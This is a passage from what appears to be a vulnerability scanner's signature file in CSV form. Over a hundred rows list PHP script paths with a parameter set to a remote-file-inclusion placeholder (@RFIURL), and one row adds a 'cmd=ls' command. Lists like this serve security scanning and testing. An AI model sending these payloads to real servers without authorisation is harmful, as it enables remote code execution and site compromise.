Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006067\",\"5292\",\"c\",\"/war.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006068\",\"5292\",\"c\",\"/warn.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006069\",\"5292\",\"c\",\"/watermark.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006070\",\"5292\",\"c\",\"/wbxml/WBXML/Decoder.php?base_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006071\",\"5292\",\"c\",\"/wbxml/WBXML/Encoder.php?base_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006072\",\"5292\",\"c\",\"/web/Administration/Includes/configureText.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006073\",\"5292\",\"c\",\"/web/Administration/Includes/contentHome.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006074\",\"5292\",\"c\",\"/web/Administration/Includes/deleteContent.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006075\",\"5292\",\"c\",\"/web/Administration/Includes/deleteUser.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006076\",\"5292\",\"c\",\"/web/Administration/Includes/userHome.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006077\",\"5292\",\"c\",\"/web/BetaBlockModules//Module/Module.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006078\",\"5292\",\"c\",\"/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006079\",\"5292\",\"c\",\"/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006080\",\"5292\",\"c\",\"/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006081\",\"5292\",\"c\",\"/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006082\",\"5292\",\"c\",\"/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006083\",\"5292\",\"c\",\"/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006084\",\"5292\",\"c\",\"/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006085\",\"5292\",\"c\",\"/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006086\",\"5292\",\"c\",\"/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006087\",\"5292\",\"c\",\"/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006088\",\"5292\",\"c\",\"/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006089\",\"5292\",\"c\",\"/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006090\",\"5292\",\"c\",\"/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006091\",\"5292\",\"c\",\"/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006092\",\"5292\",\"c\",\"/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006093\",\"5292\",\"c\",\"/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006094\",\"5292\",\"c\",\"/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006095\",\"5292\",\"c\",\"/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006096\",\"5292\",\"c\",\"/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006097\",\"5292\",\"c\",\"/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006098\",\"5292\",\"c\",\"/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006099\",\"5292\",\"c\",\"/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006100\",\"5292\",\"c\",\"/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006101\",\"5292\",\"c\",\"/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006102\",\"5292\",\"c\",\"/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006103\",\"5292\",\"c\",\"/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006104\",\"5292\",\"c\",\"/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006105\",\"5292\",\"c\",\"/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006106\",\"5292\",\"c\",\"/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006107\",\"5292\",\"c\",\"/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006108\",\"5292\",\"c\",\"/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006109\",\"5292\",\"c\",\"/web/BetaBlockModules/MyNetworksModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006110\",\"5292\",\"c\",\"/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006111\",\"5292\",\"c\",\"/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006112\",\"5292\",\"c\",\"/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006113\",\"5292\",\"c\",\"/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006114\",\"5292\",\"c\",\"/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006115\",\"5292\",\"c\",\"/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006116\",\"5292\",\"c\",\"/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006117\",\"5292\",\"c\",\"/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006118\",\"5292\",\"c\",\"/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006119\",\"5292\",\"c\",\"/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006120\",\"5292\",\"c\",\"/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006121\",\"5292\",\"c\",\"/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006122\",\"5292\",\"c\",\"/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006123\",\"5292\",\"c\",\"/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006124\",\"5292\",\"c\",\"/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006125\",\"5292\",\"c\",\"/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006126\",\"5292\",\"c\",\"/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006127\",\"5292\",\"c\",\"/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006128\",\"5292\",\"c\",\"/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006129\",\"5292\",\"c\",\"/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006130\",\"5292\",\"c\",\"/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006131\",\"5292\",\"c\",\"/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006132\",\"5292\",\"c\",\"/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006133\",\"5292\",\"c\",\"/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006134\",\"5292\",\"c\",\"/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006135\",\"5292\",\"c\",\"/web/Flickrclient.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006136\",\"5292\",\"c\",\"/web/help.php?LIBSDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006137\",\"5292\",\"c\",\"/web/includes/blogger.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006138\",\"5292\",\"c\",\"/web/includes/functions/auto_email_notify.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006139\",\"5292\",\"c\",\"/web/includes/functions/html_generate.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006140\",\"5292\",\"c\",\"/web/includes/functions/validations.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006141\",\"5292\",\"c\",\"/web/index.php?LIBSDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006142\",\"5292\",\"c\",\"/web/lib/xml/oai/ListRecords.php?xml_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006143\",\"5292\",\"c\",\"/web/login.php?LIBSDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006144\",\"5292\",\"c\",\"/web/logout.php?LIBSDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006145\",\"5292\",\"c\",\"/web/lom.php?ETCDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006146\",\"5292\",\"c\",\"/web/network_module_selector.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006147\",\"5292\",\"c\",\"/web/submit_abuse.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006148\",\"5292\",\"c\",\"/web/submit_comment.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006149\",\"5292\",\"c\",\"/webavis/class/class.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006150\",\"5292\",\"c\",\"/webavis/class/class.php?root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006151\",\"5292\",\"c\",\"/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006152\",\"5292\",\"c\",\"/webnews/template.php?content_page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006153\",\"5292\",\"c\",\"/webroot/css.php?CONFIGS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006154\",\"5292\",\"c\",\"/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006155\",\"5292\",\"c\",\"/webyep-system/programm/webyep.php?webyep_sIncludePath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006156\",\"5292\",\"c\",\"/window.php?action=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006157\",\"5292\",\"c\",\"@WORDPRESSwp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006158\",\"5292\",\"c\",\"/work/index.php?g_include=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006159\",\"5292\",\"c\",\"/work/module/forum/forum.php?g_include=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006160\",\"5292\",\"c\",\"/worldpay_notify.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006161\",\"5292\",\"c\",\"@WORDPRESSwp-cache-phase1.php?plugin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006162\",\"5292\",\"c\",\"@WORDPRESSwp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006163\",\"5292\",\"c\",\"@WORDPRESSwp-content/plugins/myflash/myflash-button.php?wpPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006164\",\"5292\",\"c\",\"@WORDPRESSwp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006165\",\"5292\",\"c\",\"@WORDPRESSwp-content/plugins/wordtube/wordtube-button.php?wpPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006166\",\"5292\",\"c\",\"@WORDPRESSwp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006167\",\"5292\",\"c\",\"@WORDPRESSwp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006168\",\"5292\",\"c\",\"/wsk/wsk.php?wsk=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006169\",\"5292\",\"c\",\"/xarg_corner.php?xarg=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006170\",\"5292\",\"c\",\"/xarg_corner_bottom.php?xarg=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006171\",\"5292\",\"c\",\"/xarg_corner_top.php?xarg=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006172\",\"5292\",\"c\",\"/xoopsgallery/init_basic.php?GALLERY_BASEDIR=@RFIURL&2093085906=1&995617320=2\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006173\",\"5292\",\"c\",\"/xoopsgallery/init_basic.php?GALLERY_BASEDIR=@RFIURL?&2093085906=1&995617320=2\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006174\",\"5292\",\"c\",\"/xt_counter.php?server_base_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 